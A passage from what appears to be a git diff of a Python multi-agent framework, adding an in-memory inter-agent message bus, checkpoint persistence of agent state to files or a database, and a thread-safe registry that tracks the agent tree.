        for i, config in enumerate(sub_agent_configs):
            task = ExecutionTask(
                agent_id=f"sub_{self.parent_agent.agent_id}_{i}",
                agent_type=config.get("agent_type", "analysis"),
                task=config.get("task", ""),
                # ``or`` guards against an explicit None in the config.
                context=config.get("context") or {},
                priority=config.get("priority", 0),
                dependencies=config.get("dependencies") or [],
            )
            modules_by_task[task.agent_id] = self._resolve_knowledge_modules(config)
            tasks.append(task)

        async def agent_factory(task: "ExecutionTask") -> Dict[str, Any]:
            return await self.create_and_run_sub_agent(
                agent_type=task.agent_type,
                task=task.task,
                context=task.context,
                knowledge_modules=modules_by_task.get(task.agent_id),
            )

        return await self._executor.execute_parallel(tasks, agent_factory)

    def get_child_results(self) -> Dict[str, Dict[str, Any]]:
        """Return a shallow copy of the recorded child results."""
        return self._child_agents.copy()

    def get_all_findings(self) -> List[Dict[str, Any]]:
        """Collect the findings of every successful child that returned data."""
        findings = []
        for result in self._child_agents.values():
            if result.get("success") and result.get("data"):
                findings.extend(result["data"].get("findings", []))
        return findings
|
||||
|
|
@ -0,0 +1,290 @@
|
|||
"""
|
||||
Agent 间通信机制
|
||||
|
||||
提供:
|
||||
- 消息类型定义
|
||||
- 消息队列管理
|
||||
- Agent间消息传递
|
||||
"""
|
||||
|
||||
import logging
|
||||
import uuid
|
||||
from datetime import datetime, timezone
|
||||
from enum import Enum
|
||||
from typing import Any, Dict, List, Optional
|
||||
from dataclasses import dataclass, field
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class MessageType(str, Enum):
    """Kind of message exchanged between agents."""

    # Request for information.
    QUERY = "query"

    # Request to perform an operation.
    INSTRUCTION = "instruction"

    # Shares a finding or a status.
    INFORMATION = "information"

    # Reports that a task has finished.
    RESULT = "result"

    # Reports an error.
    ERROR = "error"
|
||||
|
||||
|
||||
class MessagePriority(str, Enum):
    """Priority level attached to a message."""

    LOW = "low"
    NORMAL = "normal"
    HIGH = "high"
    URGENT = "urgent"
|
||||
|
||||
|
||||
@dataclass
class AgentMessage:
    """
    Message exchanged between agents.

    Carries sender, recipient, content, type, priority and delivery state,
    and converts to/from a plain dict and to an XML snippet.
    """

    id: str = field(default_factory=lambda: f"msg_{uuid.uuid4().hex[:8]}")
    from_agent: str = ""
    to_agent: str = ""
    content: str = ""
    message_type: MessageType = MessageType.INFORMATION
    priority: MessagePriority = MessagePriority.NORMAL
    timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())

    # Delivery state
    delivered: bool = False
    read: bool = False

    # Extra payload
    metadata: Dict[str, Any] = field(default_factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        """Return the message as a dict; enum members are reduced to their values."""
        kind = self.message_type
        if isinstance(kind, MessageType):
            kind = kind.value

        level = self.priority
        if isinstance(level, MessagePriority):
            level = level.value

        payload: Dict[str, Any] = {}
        payload["id"] = self.id
        payload["from"] = self.from_agent
        payload["to"] = self.to_agent
        payload["content"] = self.content
        payload["message_type"] = kind
        payload["priority"] = level
        payload["timestamp"] = self.timestamp
        payload["delivered"] = self.delivered
        payload["read"] = self.read
        payload["metadata"] = self.metadata
        return payload

    @classmethod
    def from_dict(cls, data: Dict[str, Any]) -> "AgentMessage":
        """Build a message from a dict shaped like the output of ``to_dict``; missing keys get defaults."""
        fallback_id = f"msg_{uuid.uuid4().hex[:8]}"
        fallback_timestamp = datetime.now(timezone.utc).isoformat()

        kwargs = dict(
            id=data.get("id", fallback_id),
            from_agent=data.get("from", ""),
            to_agent=data.get("to", ""),
            content=data.get("content", ""),
            message_type=MessageType(data.get("message_type", "information")),
            priority=MessagePriority(data.get("priority", "normal")),
            timestamp=data.get("timestamp", fallback_timestamp),
            delivered=data.get("delivered", False),
            read=data.get("read", False),
            metadata=data.get("metadata", {}),
        )
        return cls(**kwargs)

    def to_xml(self) -> str:
        """Render the message as an XML snippet (meant to be read by the LLM)."""
        kind = self.message_type.value if isinstance(self.message_type, MessageType) else self.message_type
        level = self.priority.value if isinstance(self.priority, MessagePriority) else self.priority
        return f"""<inter_agent_message>
<sender>
<agent_id>{self.from_agent}</agent_id>
</sender>
<message_metadata>
<type>{kind}</type>
<priority>{level}</priority>
<timestamp>{self.timestamp}</timestamp>
</message_metadata>
<content>
{self.content}
</content>
</inter_agent_message>"""
|
||||
|
||||
|
||||
class MessageBus:
    """
    In-memory message bus for agent-to-agent messaging.

    Keeps one inbox (a list of messages) per agent ID, plus a history of
    every message that was sent.
    """

    def __init__(self):
        # Inbox of each agent, keyed by agent ID.
        self._queues: Dict[str, List[AgentMessage]] = {}
        # Every message ever sent, in send order.
        self._message_history: List[AgentMessage] = []

    def create_queue(self, agent_id: str) -> None:
        """Create an empty inbox for the agent unless it already has one."""
        if agent_id not in self._queues:
            self._queues[agent_id] = []
            logger.debug(f"Created message queue for agent: {agent_id}")

    def delete_queue(self, agent_id: str) -> None:
        """Remove the agent's inbox, if it exists."""
        if agent_id in self._queues:
            del self._queues[agent_id]
            logger.debug(f"Deleted message queue for agent: {agent_id}")

    def send_message(
        self,
        from_agent: str,
        to_agent: str,
        content: str,
        message_type: MessageType = MessageType.INFORMATION,
        priority: MessagePriority = MessagePriority.NORMAL,
        metadata: Optional[Dict[str, Any]] = None,
    ) -> AgentMessage:
        """
        Send a message.

        The recipient's inbox is created on demand; the message is appended
        to it, marked as delivered and recorded in the history.

        Args:
            from_agent: Sender agent ID.
            to_agent: Recipient agent ID.
            content: Message content.
            message_type: Message type.
            priority: Priority.
            metadata: Extra data attached to the message.

        Returns:
            The message that was sent.
        """
        message = AgentMessage(
            from_agent=from_agent,
            to_agent=to_agent,
            content=content,
            message_type=message_type,
            priority=priority,
            metadata=metadata or {},
        )

        if to_agent not in self._queues:
            self.create_queue(to_agent)

        self._queues[to_agent].append(message)
        message.delivered = True

        self._message_history.append(message)

        logger.debug(f"Message sent from {from_agent} to {to_agent}: {content[:50]}...")
        return message

    def get_messages(
        self,
        agent_id: str,
        unread_only: bool = True,
        mark_as_read: bool = True,
    ) -> List[AgentMessage]:
        """
        Return the agent's messages.

        Args:
            agent_id: Agent ID.
            unread_only: Return only messages not yet marked as read.
            mark_as_read: Mark the returned messages as read.

        Returns:
            A new list of messages (empty when the agent has no inbox); the
            internal inbox list itself is never handed out.
        """
        queue = self._queues.get(agent_id)
        if queue is None:
            return []

        if unread_only:
            messages = [m for m in queue if not m.read]
        else:
            # Copy so that callers cannot mutate the inbox through the result.
            messages = list(queue)

        if mark_as_read:
            for m in messages:
                m.read = True

        return messages

    def has_unread_messages(self, agent_id: str) -> bool:
        """Return True when the agent's inbox contains an unread message."""
        if agent_id not in self._queues:
            return False
        return any(not m.read for m in self._queues[agent_id])

    def get_unread_count(self, agent_id: str) -> int:
        """Return the number of unread messages in the agent's inbox."""
        if agent_id not in self._queues:
            return 0
        return sum(1 for m in self._queues[agent_id] if not m.read)

    def send_user_message(
        self,
        to_agent: str,
        content: str,
        priority: MessagePriority = MessagePriority.HIGH,
    ) -> AgentMessage:
        """Send an INSTRUCTION message from the sender ``"user"`` to an agent."""
        return self.send_message(
            from_agent="user",
            to_agent=to_agent,
            content=content,
            message_type=MessageType.INSTRUCTION,
            priority=priority,
        )

    def send_completion_report(
        self,
        from_agent: str,
        to_agent: str,
        summary: str,
        findings: List[Dict[str, Any]],
        success: bool = True,
    ) -> AgentMessage:
        """
        Send a task-completion report as a high-priority RESULT message.

        The content is an XML snippet with status, summary and findings
        count; summary, findings and success are also attached as metadata.
        """
        # NOTE(review): ``summary`` is interpolated without XML escaping.
        content = f"""<agent_completion_report>
<status>{"SUCCESS" if success else "FAILED"}</status>
<summary>{summary}</summary>
<findings_count>{len(findings)}</findings_count>
</agent_completion_report>"""

        return self.send_message(
            from_agent=from_agent,
            to_agent=to_agent,
            content=content,
            message_type=MessageType.RESULT,
            priority=MessagePriority.HIGH,
            metadata={
                "summary": summary,
                "findings": findings,
                "success": success,
            },
        )

    def clear_queue(self, agent_id: str) -> None:
        """Empty the agent's inbox, if it exists."""
        if agent_id in self._queues:
            self._queues[agent_id] = []

    def clear_all(self) -> None:
        """Drop every inbox and the whole message history."""
        self._queues.clear()
        self._message_history.clear()

    def get_message_history(
        self,
        agent_id: Optional[str] = None,
        limit: int = 100,
    ) -> List[AgentMessage]:
        """
        Return the most recent messages from the history.

        Args:
            agent_id: When given, only messages sent by or to this agent.
            limit: Maximum number of messages to return; zero or a negative
                value yields an empty list.

        Returns:
            Up to ``limit`` messages, oldest first.
        """
        # ``history[-0:]`` would be the whole list, so handle it explicitly.
        if limit <= 0:
            return []

        history = self._message_history

        if agent_id:
            history = [
                m for m in history
                if m.from_agent == agent_id or m.to_agent == agent_id
            ]

        return history[-limit:]
|
||||
|
||||
|
||||
# Global message bus instance
|
||||
message_bus = MessageBus()
|
||||
|
|
@ -0,0 +1,413 @@
|
|||
"""
|
||||
Agent 状态持久化模块
|
||||
|
||||
提供 Agent 状态的持久化和恢复功能:
|
||||
- Agent 状态序列化和反序列化
|
||||
- 检查点保存和恢复
|
||||
- 消息历史持久化
|
||||
- 执行记录持久化
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, Any, List, Optional
|
||||
from pathlib import Path
|
||||
|
||||
from .state import AgentState, AgentStatus
|
||||
from .registry import agent_registry
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AgentStatePersistence:
|
||||
"""
|
||||
Agent 状态持久化管理器
|
||||
|
||||
支持:
|
||||
- 文件系统持久化
|
||||
- 数据库持久化(可选)
|
||||
- 检查点机制
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
persist_dir: str = "./agent_checkpoints",
|
||||
use_database: bool = False,
|
||||
db_session_factory=None,
|
||||
):
|
||||
"""
|
||||
初始化持久化管理器
|
||||
|
||||
Args:
|
||||
persist_dir: 持久化目录
|
||||
use_database: 是否使用数据库持久化
|
||||
db_session_factory: 数据库会话工厂
|
||||
"""
|
||||
self.persist_dir = Path(persist_dir)
|
||||
self.use_database = use_database
|
||||
self.db_session_factory = db_session_factory
|
||||
|
||||
# 确保目录存在
|
||||
self.persist_dir.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
# ============ 文件系统持久化 ============
|
||||
|
||||
def save_state(self, state: AgentState, checkpoint_name: Optional[str] = None) -> str:
|
||||
"""
|
||||
保存 Agent 状态到文件
|
||||
|
||||
Args:
|
||||
state: Agent 状态
|
||||
checkpoint_name: 检查点名称(可选)
|
||||
|
||||
Returns:
|
||||
保存的文件路径
|
||||
"""
|
||||
# 生成文件名
|
||||
if checkpoint_name:
|
||||
filename = f"{state.agent_id}_{checkpoint_name}.json"
|
||||
else:
|
||||
timestamp = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S")
|
||||
filename = f"{state.agent_id}_{timestamp}.json"
|
||||
|
||||
filepath = self.persist_dir / filename
|
||||
|
||||
# 序列化状态
|
||||
state_dict = self._serialize_state(state)
|
||||
|
||||
# 保存到文件
|
||||
with open(filepath, "w", encoding="utf-8") as f:
|
||||
json.dump(state_dict, f, ensure_ascii=False, indent=2)
|
||||
|
||||
logger.info(f"Saved agent state to {filepath}")
|
||||
return str(filepath)
|
||||
|
||||
def load_state(self, filepath: str) -> Optional[AgentState]:
|
||||
"""
|
||||
从文件加载 Agent 状态
|
||||
|
||||
Args:
|
||||
filepath: 文件路径
|
||||
|
||||
Returns:
|
||||
Agent 状态,如果加载失败返回 None
|
||||
"""
|
||||
try:
|
||||
with open(filepath, "r", encoding="utf-8") as f:
|
||||
state_dict = json.load(f)
|
||||
|
||||
state = self._deserialize_state(state_dict)
|
||||
logger.info(f"Loaded agent state from {filepath}")
|
||||
return state
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to load agent state from {filepath}: {e}")
|
||||
return None
|
||||
|
||||
def load_latest_checkpoint(self, agent_id: str) -> Optional[AgentState]:
|
||||
"""
|
||||
加载指定 Agent 的最新检查点
|
||||
|
||||
Args:
|
||||
agent_id: Agent ID
|
||||
|
||||
Returns:
|
||||
Agent 状态
|
||||
"""
|
||||
# 查找所有匹配的检查点文件
|
||||
pattern = f"{agent_id}_*.json"
|
||||
checkpoints = list(self.persist_dir.glob(pattern))
|
||||
|
||||
if not checkpoints:
|
||||
logger.warning(f"No checkpoints found for agent {agent_id}")
|
||||
return None
|
||||
|
||||
# 按修改时间排序,取最新的
|
||||
latest = max(checkpoints, key=lambda p: p.stat().st_mtime)
|
||||
return self.load_state(str(latest))
|
||||
|
||||
def list_checkpoints(self, agent_id: Optional[str] = None) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
列出检查点
|
||||
|
||||
Args:
|
||||
agent_id: Agent ID(可选,不指定则列出所有)
|
||||
|
||||
Returns:
|
||||
检查点信息列表
|
||||
"""
|
||||
if agent_id:
|
||||
pattern = f"{agent_id}_*.json"
|
||||
else:
|
||||
pattern = "*.json"
|
||||
|
||||
checkpoints = []
|
||||
for filepath in self.persist_dir.glob(pattern):
|
||||
stat = filepath.stat()
|
||||
checkpoints.append({
|
||||
"filepath": str(filepath),
|
||||
"filename": filepath.name,
|
||||
"size_bytes": stat.st_size,
|
||||
"created_at": datetime.fromtimestamp(stat.st_ctime, tz=timezone.utc).isoformat(),
|
||||
"modified_at": datetime.fromtimestamp(stat.st_mtime, tz=timezone.utc).isoformat(),
|
||||
})
|
||||
|
||||
# 按修改时间排序
|
||||
checkpoints.sort(key=lambda x: x["modified_at"], reverse=True)
|
||||
return checkpoints
|
||||
|
||||
def delete_checkpoint(self, filepath: str) -> bool:
|
||||
"""
|
||||
删除检查点
|
||||
|
||||
Args:
|
||||
filepath: 文件路径
|
||||
|
||||
Returns:
|
||||
是否删除成功
|
||||
"""
|
||||
try:
|
||||
os.remove(filepath)
|
||||
logger.info(f"Deleted checkpoint: {filepath}")
|
||||
return True
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to delete checkpoint {filepath}: {e}")
|
||||
return False
|
||||
|
||||
def cleanup_old_checkpoints(
|
||||
self,
|
||||
agent_id: str,
|
||||
keep_count: int = 5,
|
||||
) -> int:
|
||||
"""
|
||||
清理旧的检查点,只保留最新的几个
|
||||
|
||||
Args:
|
||||
agent_id: Agent ID
|
||||
keep_count: 保留的检查点数量
|
||||
|
||||
Returns:
|
||||
删除的检查点数量
|
||||
"""
|
||||
checkpoints = self.list_checkpoints(agent_id)
|
||||
|
||||
if len(checkpoints) <= keep_count:
|
||||
return 0
|
||||
|
||||
# 删除旧的检查点
|
||||
to_delete = checkpoints[keep_count:]
|
||||
deleted = 0
|
||||
|
||||
for cp in to_delete:
|
||||
if self.delete_checkpoint(cp["filepath"]):
|
||||
deleted += 1
|
||||
|
||||
return deleted
|
||||
|
||||
# ============ 序列化/反序列化 ============
|
||||
|
||||
def _serialize_state(self, state: AgentState) -> Dict[str, Any]:
|
||||
"""序列化 Agent 状态"""
|
||||
return {
|
||||
"version": "1.0",
|
||||
"serialized_at": datetime.now(timezone.utc).isoformat(),
|
||||
"state": state.model_dump(),
|
||||
}
|
||||
|
||||
def _deserialize_state(self, data: Dict[str, Any]) -> AgentState:
|
||||
"""反序列化 Agent 状态"""
|
||||
version = data.get("version", "1.0")
|
||||
state_data = data.get("state", data)
|
||||
|
||||
# 处理版本兼容性
|
||||
if version == "1.0":
|
||||
return AgentState(**state_data)
|
||||
else:
|
||||
logger.warning(f"Unknown state version: {version}, attempting to load anyway")
|
||||
return AgentState(**state_data)
|
||||
|
||||
# ============ 数据库持久化 ============
|
||||
|
||||
async def save_state_to_db(
    self,
    state: AgentState,
    task_id: str,
) -> bool:
    """
    Persist an agent state as a new ``AgentCheckpoint`` row.

    Args:
        state: The agent state to store.
        task_id: ID of the task the checkpoint belongs to.

    Returns:
        True when the row was committed; False when database persistence is
        not configured or any exception was raised (the error is logged).
    """
    db_ready = self.use_database and self.db_session_factory
    if not db_ready:
        logger.warning("Database persistence not configured")
        return False

    try:
        async with self.db_session_factory() as session:
            # Imported here rather than at module level, as in the original.
            from app.models.agent_task import AgentCheckpoint

            row_fields = dict(
                task_id=task_id,
                agent_id=state.agent_id,
                agent_name=state.agent_name,
                agent_type=state.agent_type,
                state_data=state.model_dump_json(),
                iteration=state.iteration,
                status=state.status,
                created_at=datetime.now(timezone.utc),
            )
            session.add(AgentCheckpoint(**row_fields))
            await session.commit()

            logger.info(f"Saved agent state to database: {state.agent_id}")
            return True

    except Exception as e:
        logger.error(f"Failed to save agent state to database: {e}")
        return False
|
||||
|
||||
async def load_state_from_db(
    self,
    task_id: str,
    agent_id: Optional[str] = None,
) -> Optional[AgentState]:
    """
    Load the most recently created checkpoint for a task from the database.

    Args:
        task_id: ID of the task whose checkpoint is wanted.
        agent_id: Optional agent ID; when given, only that agent's
            checkpoints are considered.

    Returns:
        The restored agent state, or None when database persistence is not
        configured, no checkpoint matches, or any exception was raised (the
        error is logged).
    """
    db_ready = self.use_database and self.db_session_factory
    if not db_ready:
        logger.warning("Database persistence not configured")
        return None

    try:
        async with self.db_session_factory() as session:
            from sqlalchemy import select
            from app.models.agent_task import AgentCheckpoint

            criteria = [AgentCheckpoint.task_id == task_id]
            if agent_id:
                criteria.append(AgentCheckpoint.agent_id == agent_id)

            # Newest row first, and only that row.
            stmt = (
                select(AgentCheckpoint)
                .where(*criteria)
                .order_by(AgentCheckpoint.created_at.desc())
                .limit(1)
            )

            outcome = await session.execute(stmt)
            latest = outcome.scalar_one_or_none()

            if not latest:
                return None

            # state_data holds the JSON text written by save_state_to_db.
            fields = json.loads(latest.state_data)
            return AgentState(**fields)

    except Exception as e:
        logger.error(f"Failed to load agent state from database: {e}")
        return None
|
||||
|
||||
|
||||
class CheckpointManager:
    """
    Checkpoint manager.

    Sits on top of a persistence object and decides when an agent state
    should be saved: every ``auto_checkpoint_interval`` iterations since the
    last checkpoint recorded for that agent. It can also restore a state from
    a given checkpoint file or from the agent's latest checkpoint.
    """

    def __init__(
        self,
        persistence: AgentStatePersistence,
        auto_checkpoint_interval: int = 5,  # save automatically every N iterations
    ):
        self.persistence = persistence
        self.auto_checkpoint_interval = auto_checkpoint_interval

        # agent_id -> iteration number at which the last checkpoint was created
        self._last_checkpoint_iteration: Dict[str, int] = {}

    def should_checkpoint(self, state: AgentState) -> bool:
        """
        Decide whether a checkpoint is due for this state.

        Args:
            state: The agent state.

        Returns:
            True when at least ``auto_checkpoint_interval`` iterations have
            passed since the agent's last recorded checkpoint (0 if none).
        """
        previous = self._last_checkpoint_iteration.get(state.agent_id, 0)
        iterations_since = state.iteration - previous
        return iterations_since >= self.auto_checkpoint_interval

    def create_checkpoint(
        self,
        state: AgentState,
        checkpoint_name: Optional[str] = None,
    ) -> str:
        """
        Save a checkpoint and remember the iteration it was taken at.

        Args:
            state: The agent state.
            checkpoint_name: Optional checkpoint name, forwarded to
                ``persistence.save_state``.

        Returns:
            The checkpoint file path returned by ``persistence.save_state``.
        """
        saved_path = self.persistence.save_state(state, checkpoint_name)
        self._last_checkpoint_iteration[state.agent_id] = state.iteration
        return saved_path

    def auto_checkpoint(self, state: AgentState) -> Optional[str]:
        """
        Create a checkpoint only if one is due.

        Args:
            state: The agent state.

        Returns:
            The checkpoint file path, or None when no checkpoint was created.
        """
        if not self.should_checkpoint(state):
            return None
        return self.create_checkpoint(state)

    def restore_from_checkpoint(
        self,
        agent_id: str,
        checkpoint_filepath: Optional[str] = None,
    ) -> Optional[AgentState]:
        """
        Restore an agent state from a checkpoint.

        Args:
            agent_id: The agent ID.
            checkpoint_filepath: Optional checkpoint file path; when omitted
                the agent's latest checkpoint is used.

        Returns:
            The restored agent state, as returned by the persistence object.
        """
        if not checkpoint_filepath:
            return self.persistence.load_latest_checkpoint(agent_id)
        return self.persistence.load_state(checkpoint_filepath)
|
||||
|
||||
|
||||
# 全局持久化管理器
|
||||
agent_persistence = AgentStatePersistence()
|
||||
checkpoint_manager = CheckpointManager(agent_persistence)
|
||||
|
|
@ -0,0 +1,309 @@
|
|||
"""
|
||||
Agent 注册表和动态Agent树管理
|
||||
|
||||
提供:
|
||||
- Agent实例注册和管理
|
||||
- 动态Agent树结构
|
||||
- Agent状态追踪
|
||||
- 子Agent创建和销毁
|
||||
"""
|
||||
|
||||
import logging
|
||||
import threading
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Dict, List, Optional, TYPE_CHECKING
|
||||
|
||||
if TYPE_CHECKING:
|
||||
from .state import AgentState
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AgentRegistry:
    """
    Registry of agent instances and of the dynamic agent tree.

    For every agent id it keeps a node record (name, type, task, status,
    parent, children, timestamps, result), plus the optional agent instance,
    state object and a message list. Mutating methods hold a re-entrant lock.
    """

    def __init__(self):
        self._lock = threading.RLock()

        # Agent graph structure
        self._agent_graph: Dict[str, Any] = {
            "nodes": {},  # agent_id -> node_info
            "edges": [],  # {from, to, type}
        }

        # Agent instances and states
        self._agent_instances: Dict[str, Any] = {}  # agent_id -> agent_instance
        self._agent_states: Dict[str, "AgentState"] = {}  # agent_id -> state

        # Message queues
        self._agent_messages: Dict[str, List[Dict[str, Any]]] = {}  # agent_id -> messages

        # Root agent
        self._root_agent_id: Optional[str] = None

        # Threads of running agents
        self._running_agents: Dict[str, threading.Thread] = {}

    # ============ Agent registration ============

    def register_agent(
        self,
        agent_id: str,
        agent_name: str,
        agent_type: str,
        task: str,
        parent_id: Optional[str] = None,
        agent_instance: Any = None,
        state: Optional["AgentState"] = None,
        knowledge_modules: Optional[List[str]] = None,
    ) -> Dict[str, Any]:
        """
        Register an agent in the registry.

        Args:
            agent_id: Unique agent identifier.
            agent_name: Agent name.
            agent_type: Agent type.
            task: Task description.
            parent_id: Parent agent ID, if any.
            agent_instance: The agent instance, stored when truthy.
            state: The agent state, stored when truthy.
            knowledge_modules: Names of the loaded knowledge modules.

        Returns:
            The node record created for the agent.
        """
        logger.info(f"[AgentRegistry] register_agent 被调用: {agent_name} (id={agent_id}, parent={parent_id})")
        logger.info(f"[AgentRegistry] 当前节点数: {len(self._agent_graph['nodes'])}, 节点列表: {list(self._agent_graph['nodes'].keys())}")

        with self._lock:
            node = {
                "id": agent_id,
                "name": agent_name,
                "type": agent_type,
                "task": task,
                "status": "running",
                "parent_id": parent_id,
                "created_at": datetime.now(timezone.utc).isoformat(),
                "finished_at": None,
                "result": None,
                "knowledge_modules": knowledge_modules or [],
                "children": [],
            }

            self._agent_graph["nodes"][agent_id] = node

            if agent_instance:
                self._agent_instances[agent_id] = agent_instance

            if state:
                self._agent_states[agent_id] = state

            # Initialise the message queue
            if agent_id not in self._agent_messages:
                self._agent_messages[agent_id] = []

            # Add the parent -> child edge
            if parent_id:
                self._agent_graph["edges"].append({
                    "from": parent_id,
                    "to": agent_id,
                    "type": "delegation",
                    "created_at": datetime.now(timezone.utc).isoformat(),
                })

                # Update the parent's children list
                if parent_id in self._agent_graph["nodes"]:
                    self._agent_graph["nodes"][parent_id]["children"].append(agent_id)

            # The first parentless agent becomes the root
            if parent_id is None and self._root_agent_id is None:
                self._root_agent_id = agent_id

            logger.info(f"[AgentRegistry] 注册完成: {agent_name} ({agent_id}), parent: {parent_id}")
            logger.info(f"[AgentRegistry] 注册后节点数: {len(self._agent_graph['nodes'])}, 节点列表: {list(self._agent_graph['nodes'].keys())}")
            return node

    def unregister_agent(self, agent_id: str) -> None:
        """
        Remove an agent and everything the registry holds for it.

        Besides the node, instance, state, messages, thread entry and edges,
        this also removes the id from its parent's ``children`` list and
        clears the root pointer when the root itself is removed. Without the
        last step a later parentless agent could never become the new root.
        """
        with self._lock:
            removed = self._agent_graph["nodes"].pop(agent_id, None)

            if removed is not None:
                parent = self._agent_graph["nodes"].get(removed.get("parent_id"))
                if parent is not None:
                    parent["children"] = [
                        child for child in parent["children"] if child != agent_id
                    ]

            self._agent_instances.pop(agent_id, None)
            self._agent_states.pop(agent_id, None)
            self._agent_messages.pop(agent_id, None)
            self._running_agents.pop(agent_id, None)

            # Drop every edge touching the agent
            self._agent_graph["edges"] = [
                e for e in self._agent_graph["edges"]
                if e["from"] != agent_id and e["to"] != agent_id
            ]

            if self._root_agent_id == agent_id:
                self._root_agent_id = None

            logger.info(f"Unregistered agent: {agent_id}")

    # ============ Agent status updates ============

    def update_agent_status(
        self,
        agent_id: str,
        status: str,
        result: Optional[Dict[str, Any]] = None,
    ) -> None:
        """
        Update an agent's status; unknown agent ids are ignored.

        ``finished_at`` is stamped for the terminal statuses "completed",
        "failed" and "stopped". ``result`` is stored only when truthy.
        """
        with self._lock:
            if agent_id in self._agent_graph["nodes"]:
                node = self._agent_graph["nodes"][agent_id]
                node["status"] = status

                if status in ["completed", "failed", "stopped"]:
                    node["finished_at"] = datetime.now(timezone.utc).isoformat()

                if result:
                    node["result"] = result

                logger.debug(f"Updated agent {agent_id} status to {status}")

    def get_agent_status(self, agent_id: str) -> Optional[str]:
        """Return the agent's status string, or None for an unknown id."""
        with self._lock:
            if agent_id in self._agent_graph["nodes"]:
                return self._agent_graph["nodes"][agent_id]["status"]
            return None

    # ============ Agent queries ============

    def get_agent(self, agent_id: str) -> Optional[Any]:
        """Return the registered agent instance, or None."""
        return self._agent_instances.get(agent_id)

    def get_agent_state(self, agent_id: str) -> Optional["AgentState"]:
        """Return the registered agent state object, or None."""
        return self._agent_states.get(agent_id)

    def get_agent_node(self, agent_id: str) -> Optional[Dict[str, Any]]:
        """Return the agent's node record, or None."""
        return self._agent_graph["nodes"].get(agent_id)

    def get_root_agent_id(self) -> Optional[str]:
        """Return the root agent ID, or None when there is no root."""
        return self._root_agent_id

    def get_children(self, agent_id: str) -> List[str]:
        """
        Return the IDs of the agent's children.

        A copy is returned so callers cannot mutate the registry's internal
        list, and can iterate it without holding the lock.
        """
        with self._lock:
            node = self._agent_graph["nodes"].get(agent_id)
            if node:
                return list(node.get("children", []))
            return []

    def get_parent(self, agent_id: str) -> Optional[str]:
        """Return the parent agent ID, or None."""
        with self._lock:
            node = self._agent_graph["nodes"].get(agent_id)
            if node:
                return node.get("parent_id")
            return None

    # ============ Agent tree operations ============

    def get_agent_tree(self) -> Dict[str, Any]:
        """
        Return the whole agent graph.

        The ``nodes`` dict and ``edges`` list are shallow copies; the
        individual node and edge dicts are shared with the registry.
        """
        with self._lock:
            return {
                "nodes": dict(self._agent_graph["nodes"]),
                "edges": list(self._agent_graph["edges"]),
                "root_agent_id": self._root_agent_id,
            }

    def get_agent_tree_view(self, agent_id: Optional[str] = None) -> str:
        """
        Render the agent tree as text.

        Args:
            agent_id: ID of the subtree root; defaults to the root agent.

        Returns:
            The rendered tree, or "No agents in the tree" when the starting
            node does not exist.
        """
        with self._lock:
            lines = ["=== AGENT TREE ==="]

            root_id = agent_id or self._root_agent_id
            if not root_id or root_id not in self._agent_graph["nodes"]:
                return "No agents in the tree"

            # Each node is rendered at most once, so a malformed graph (e.g.
            # an agent registered as its own parent) cannot recurse forever.
            visited = set()

            def _build_tree(aid: str, depth: int = 0) -> None:
                node = self._agent_graph["nodes"].get(aid)
                if not node or aid in visited:
                    return
                visited.add(aid)

                indent = " " * depth
                status_emoji = {
                    "running": "🔄",
                    "waiting": "⏳",
                    "completed": "✅",
                    "failed": "❌",
                    "stopped": "🛑",
                }.get(node["status"], "❓")

                lines.append(f"{indent}{status_emoji} {node['name']} ({aid})")
                lines.append(f"{indent} Task: {node['task'][:50]}...")
                lines.append(f"{indent} Status: {node['status']}")

                if node.get("knowledge_modules"):
                    lines.append(f"{indent} Modules: {', '.join(node['knowledge_modules'])}")

                for child_id in node.get("children", []):
                    _build_tree(child_id, depth + 1)

            _build_tree(root_id)
            return "\n".join(lines)

    def get_statistics(self) -> Dict[str, int]:
        """
        Count agents in total and per status.

        Only "running", "waiting", "completed", "failed" and "stopped" are
        counted; nodes with any other status contribute to ``total`` only.
        """
        with self._lock:
            stats = {
                "total": len(self._agent_graph["nodes"]),
                "running": 0,
                "waiting": 0,
                "completed": 0,
                "failed": 0,
                "stopped": 0,
            }

            for node in self._agent_graph["nodes"].values():
                status = node.get("status", "unknown")
                if status in stats:
                    stats[status] += 1

            return stats

    # ============ Cleanup ============

    def clear(self) -> None:
        """Empty the registry completely."""
        with self._lock:
            self._agent_graph = {"nodes": {}, "edges": []}
            self._agent_instances.clear()
            self._agent_states.clear()
            self._agent_messages.clear()
            self._running_agents.clear()
            self._root_agent_id = None
            logger.info("Agent registry cleared")

    def cleanup_finished_agents(self) -> int:
        """
        Release the instances and thread entries of finished agents.

        Node records are kept. Returns the number of agents whose status is
        "completed", "failed" or "stopped".
        """
        with self._lock:
            finished_ids = [
                aid for aid, node in self._agent_graph["nodes"].items()
                if node["status"] in ["completed", "failed", "stopped"]
            ]

            for aid in finished_ids:
                # Keep the node record, drop only the live objects
                self._agent_instances.pop(aid, None)
                self._running_agents.pop(aid, None)

            return len(finished_ids)
|
||||
|
||||
|
||||
# 全局注册表实例
|
||||
agent_registry = AgentRegistry()
|
||||
|
|
@ -0,0 +1,297 @@
|
|||
"""
|
||||
Agent 状态管理模块
|
||||
|
||||
提供完整的Agent状态管理,支持:
|
||||
- 完整的生命周期管理
|
||||
- 状态序列化和持久化
|
||||
- 暂停和恢复
|
||||
- 动态Agent树结构
|
||||
"""
|
||||
|
||||
import uuid
|
||||
from datetime import datetime, timezone
|
||||
from enum import Enum
|
||||
from typing import Any, Dict, List, Optional
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
|
||||
def _generate_agent_id() -> str:
|
||||
"""生成唯一的Agent ID"""
|
||||
return f"agent_{uuid.uuid4().hex[:8]}"
|
||||
|
||||
|
||||
class AgentStatus(str, Enum):
